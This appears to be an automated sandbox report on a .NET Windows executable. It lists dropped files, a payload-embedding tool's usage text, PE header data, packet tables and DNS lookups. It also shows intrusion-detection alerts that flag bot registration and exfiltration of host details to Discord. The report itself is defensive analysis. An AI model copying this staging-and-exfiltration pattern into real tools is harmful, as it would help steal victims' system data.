                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxnftdea.1qr.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tz3glvhd.30y.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3uud354.iyx.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrp0ca40.4bs.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            \Device\ConDrv

                                            Download File
                                            Process:C:\Users\user\Desktop\vF20HtY4a4.exe
                                            File Type:ASCII text, with CRLF, LF line terminators
                                            Category:dropped
                                            Size (bytes):199
                                            Entropy (8bit):4.621901208289922
                                            Encrypted:false
                                            SSDEEP:6:l/1KUMFOR8PEpYBYLLELptheFuiBQIBhty:5MF8oEpYBjpLeYIBny
                                            MD5:1E546A14D1D9A4976E6F9872322BC295
                                            SHA1:6548F9F3811B088D64CA3392BBBC404032B63E68
                                            SHA-256:EE7262265283097B23FDE4B00BBB88450E7838C0DBF7EC41B68B0DD642CADFFB
                                            SHA-512:9D71B2D057A7AC6FD39263D04EF4973451DE29FF0B061E12FC9C81AFEC0D9DF7AFC9C01527CC2F3E42257DC72ED947373DB10B28F1ED520E206E3517A4B5E494
                                            Malicious:false
                                            Preview:Usage: Origami.exe <file> <mode> or Origami.exe <file>..Available modes:.-pes: Uses additional PE section for the payload data.-dbg: Uses PE Debug Directory for the payload data..Default mode: -pes..

                                            Static File Info

                                            General

                                            File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):5.792685453634147
                                            TrID:
                                            • Win64 Executable Console Net Framework (206006/5) 48.58%
                                            • Win64 Executable Console (202006/5) 47.64%
                                            • Win64 Executable (generic) (12005/4) 2.83%
                                            • Generic Win/DOS Executable (2004/3) 0.47%
                                            • DOS Executable Generic (2002/1) 0.47%
                                            File name:vF20HtY4a4.exe
                                            File size:24'064 bytes
                                            MD5:d17a39ca8331a4ce65261b1b6dc7e6ac
                                            SHA1:7972d0341973a0816d2534f187676f9c00dc38c7
                                            SHA256:f06b0c9ae4553b0558c06ecfcb657a9f1d5a42da37caec81ae4a91dd5d03b332
                                            SHA512:eaf6c0af6ebb30b745e89cc4425097611cfaf6516635a2e246b003e4efe5120b755e8358e5134ec0289769361791ebe866e9ccd6268e24a42adcfbd23d785b49
                                            SSDEEP:384:AiSnaFctej9mJ3aN8cmUdxfFujScZCLHABsbQVWyO+CrNCzgSodIyII5/rSKrp2:AiSjej9maN8GdGucubN+iLdIyIkJ2
                                            TLSH:15B21B0063E8CB2AD9FE9F7FB672104406F2F701752AE7481C8C169F5DA7B8412927B6
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...8.z..........."...0..V............... .....@..... ....................................`...@......@............... .....

                                            File Icon

                                            Icon Hash:00928e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x140000000
                                            Entrypoint Section:
                                            Digitally signed:false
                                            Imagebase:0x140000000
                                            Subsystem:windows cui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0xDE7ACC38 [Mon Apr 12 06:27:04 2088 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:

                                            Entrypoint Preview

                                            Instruction
                                            dec ebp
                                            pop edx
                                            nop
                                            add byte ptr [ebx], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax+eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x53c.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x74740x54.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x557b0x56001dc5ea34b3ebce2db01f3a0796c01cf6False0.5027707122093024data5.926880250428821IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0x80000x53c0x60000487c284a2288bcdf1d846d78b7107fFalse0.3873697916666667data3.880372350124212IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0x80900x2acdata0.4283625730994152
                                            RT_MANIFEST0x834c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-10-15T16:14:36.548868+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.649841162.159.136.232443TCP
                                            2024-10-15T16:14:49.219568+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.649865162.159.136.232443TCP
                                            2024-10-15T16:14:56.440572+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.649895162.159.136.232443TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 15, 2024 16:14:15.008182049 CEST4976180192.168.2.6104.17.112.233
                                            Oct 15, 2024 16:14:15.013091087 CEST8049761104.17.112.233192.168.2.6
                                            Oct 15, 2024 16:14:15.013181925 CEST4976180192.168.2.6104.17.112.233
                                            Oct 15, 2024 16:14:15.016047955 CEST4976180192.168.2.6104.17.112.233
                                            Oct 15, 2024 16:14:15.021083117 CEST8049761104.17.112.233192.168.2.6
                                            Oct 15, 2024 16:14:15.701669931 CEST8049761104.17.112.233192.168.2.6
                                            Oct 15, 2024 16:14:15.701783895 CEST8049761104.17.112.233192.168.2.6
                                            Oct 15, 2024 16:14:15.703003883 CEST4976180192.168.2.6104.17.112.233
                                            Oct 15, 2024 16:14:15.725296021 CEST49765443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:15.725349903 CEST44349765185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:15.725430012 CEST49765443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:15.733114004 CEST49765443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:15.733160019 CEST44349765185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:16.451894999 CEST44349765185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:16.451981068 CEST49765443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:16.455797911 CEST49765443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:16.455816031 CEST44349765185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:16.456165075 CEST44349765185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:16.463473082 CEST49765443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:16.511405945 CEST44349765185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:16.687268019 CEST44349765185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:16.687336922 CEST44349765185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:16.687360048 CEST44349765185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:16.687401056 CEST44349765185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:16.687407017 CEST49765443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:16.687443018 CEST44349765185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:16.687463999 CEST49765443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:16.687491894 CEST44349765185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:16.687551022 CEST44349765185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:16.687589884 CEST49765443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:16.722886086 CEST49765443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:31.974256039 CEST4983380192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:31.979377985 CEST8049833104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:31.979469061 CEST4983380192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:31.980628014 CEST4983380192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:31.985476017 CEST8049833104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:32.651866913 CEST8049833104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:32.686002970 CEST49834443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:32.686045885 CEST44349834104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:32.686161041 CEST49834443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:32.701432943 CEST4983380192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:32.719063997 CEST49834443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:32.719095945 CEST44349834104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:33.344758034 CEST44349834104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:33.344878912 CEST49834443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:33.347493887 CEST49834443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:33.347503901 CEST44349834104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:33.347748995 CEST44349834104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:33.357501030 CEST49834443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:33.399410009 CEST44349834104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:33.517540932 CEST44349834104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:33.517646074 CEST44349834104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:33.517724991 CEST49834443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:33.531997919 CEST49834443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:33.555571079 CEST4983780192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:33.560609102 CEST8049837185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:33.560693979 CEST4983780192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:33.561064959 CEST4983780192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:33.566140890 CEST8049837185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:34.198551893 CEST8049837185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:34.198817015 CEST4983780192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:34.200675964 CEST49838443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:34.200711966 CEST44349838185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:34.200808048 CEST49838443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:34.201087952 CEST49838443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:34.201117039 CEST44349838185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:34.204364061 CEST8049837185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:34.204425097 CEST4983780192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:34.204428911 CEST8049837185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:34.869008064 CEST44349838185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:34.869275093 CEST49838443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:34.870922089 CEST49838443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:34.870939016 CEST44349838185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:34.871181011 CEST44349838185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:34.872584105 CEST49838443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:34.919405937 CEST44349838185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:35.124946117 CEST44349838185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:35.124994040 CEST44349838185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:35.125029087 CEST44349838185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:35.125052929 CEST44349838185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:35.125073910 CEST44349838185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:35.125111103 CEST44349838185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:35.125169039 CEST44349838185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:35.125171900 CEST49838443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:35.125319004 CEST49838443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:35.125390053 CEST49838443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:35.635284901 CEST49841443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:35.635338068 CEST44349841162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:35.635410070 CEST49841443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:35.635869980 CEST49841443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:35.635890007 CEST44349841162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:35.649662971 CEST49838443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:36.277848959 CEST44349841162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:36.277913094 CEST49841443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:36.279898882 CEST49841443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:36.279911995 CEST44349841162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:36.280193090 CEST44349841162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:36.283723116 CEST49841443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:36.331407070 CEST44349841162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:36.331527948 CEST49841443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:36.331543922 CEST44349841162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:36.548885107 CEST44349841162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:36.548957109 CEST44349841162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:36.549088001 CEST49841443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:36.571825027 CEST49841443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:36.704543114 CEST4976180192.168.2.6104.17.112.233
                                            Oct 15, 2024 16:14:39.604727030 CEST4984780192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:39.613912106 CEST8049847104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:39.617984056 CEST4984780192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:39.618814945 CEST4984780192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:39.627975941 CEST8049847104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:40.262598038 CEST8049847104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:40.264827967 CEST49849443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:40.264866114 CEST44349849104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:40.265028000 CEST49849443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:40.268259048 CEST49849443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:40.268276930 CEST44349849104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:40.310784101 CEST4984780192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:40.923516035 CEST44349849104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:40.923584938 CEST49849443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:40.930510044 CEST49849443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:40.930536032 CEST44349849104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:40.930867910 CEST44349849104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:40.944487095 CEST49849443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:40.991400957 CEST44349849104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:41.107011080 CEST44349849104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:41.107151985 CEST44349849104.20.3.235192.168.2.6
                                            Oct 15, 2024 16:14:41.107203007 CEST49849443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:41.119750977 CEST49849443192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:41.132466078 CEST4985180192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:41.140620947 CEST8049851185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:41.140727043 CEST4985180192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:41.140902996 CEST4985180192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:41.148395061 CEST8049851185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:42.192260027 CEST8049851185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:42.193980932 CEST4985180192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:42.194849014 CEST49853443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:42.194899082 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:42.195532084 CEST49853443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:42.195867062 CEST49853443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:42.195898056 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:42.199184895 CEST8049851185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:42.199299097 CEST4985180192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:42.886665106 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:42.886909962 CEST49853443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:42.889636993 CEST49853443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:42.889682055 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:42.889930964 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:42.891290903 CEST49853443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:42.931443930 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:43.034590960 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:43.035171032 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:43.035193920 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:43.035248995 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:43.035258055 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:43.035278082 CEST49853443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:43.035301924 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:43.035310030 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:43.035320044 CEST49853443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:43.035350084 CEST49853443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:43.037336111 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:43.037381887 CEST44349853185.199.108.133192.168.2.6
                                            Oct 15, 2024 16:14:43.037391901 CEST49853443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:43.037421942 CEST49853443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:43.108326912 CEST49853443192.168.2.6185.199.108.133
                                            Oct 15, 2024 16:14:48.246021986 CEST49865443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:48.246081114 CEST44349865162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:48.246177912 CEST49865443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:48.246537924 CEST49865443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:48.246557951 CEST44349865162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:48.983001947 CEST44349865162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:48.983143091 CEST49865443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:48.988812923 CEST49865443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:48.988873005 CEST44349865162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:48.989249945 CEST44349865162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:48.990643978 CEST49865443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:49.035412073 CEST44349865162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:49.035541058 CEST49865443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:49.035559893 CEST44349865162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:49.219583035 CEST44349865162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:49.219672918 CEST44349865162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:49.219737053 CEST49865443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:49.222174883 CEST49865443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:54.260296106 CEST4983380192.168.2.6104.20.3.235
                                            Oct 15, 2024 16:14:55.564483881 CEST49895443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:55.564534903 CEST44349895162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:55.564630985 CEST49895443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:55.565011978 CEST49895443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:55.565023899 CEST44349895162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:56.209881067 CEST44349895162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:56.210036039 CEST49895443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:56.211422920 CEST49895443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:56.211432934 CEST44349895162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:56.212472916 CEST44349895162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:56.213274956 CEST49895443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:56.259406090 CEST44349895162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:56.259519100 CEST49895443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:56.259540081 CEST44349895162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:56.440635920 CEST44349895162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:56.440807104 CEST44349895162.159.136.232192.168.2.6
                                            Oct 15, 2024 16:14:56.440912962 CEST49895443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:14:56.443687916 CEST49895443192.168.2.6162.159.136.232
                                            Oct 15, 2024 16:15:01.471796036 CEST4984780192.168.2.6104.20.3.235

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 15, 2024 16:14:14.986258984 CEST6017153192.168.2.61.1.1.1
                                            Oct 15, 2024 16:14:14.994728088 CEST53601711.1.1.1192.168.2.6
                                            Oct 15, 2024 16:14:15.711580038 CEST6031453192.168.2.61.1.1.1
                                            Oct 15, 2024 16:14:15.720431089 CEST53603141.1.1.1192.168.2.6
                                            Oct 15, 2024 16:14:31.960227966 CEST5228953192.168.2.61.1.1.1
                                            Oct 15, 2024 16:14:31.967370987 CEST53522891.1.1.1192.168.2.6
                                            Oct 15, 2024 16:14:35.627660990 CEST5741453192.168.2.61.1.1.1
                                            Oct 15, 2024 16:14:35.634560108 CEST53574141.1.1.1192.168.2.6

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Oct 15, 2024 16:14:14.986258984 CEST192.168.2.61.1.1.10xb503Standard query (0)tinyurl.comA (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:15.711580038 CEST192.168.2.61.1.1.10x289fStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:31.960227966 CEST192.168.2.61.1.1.10x2651Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:35.627660990 CEST192.168.2.61.1.1.10xa015Standard query (0)discord.comA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
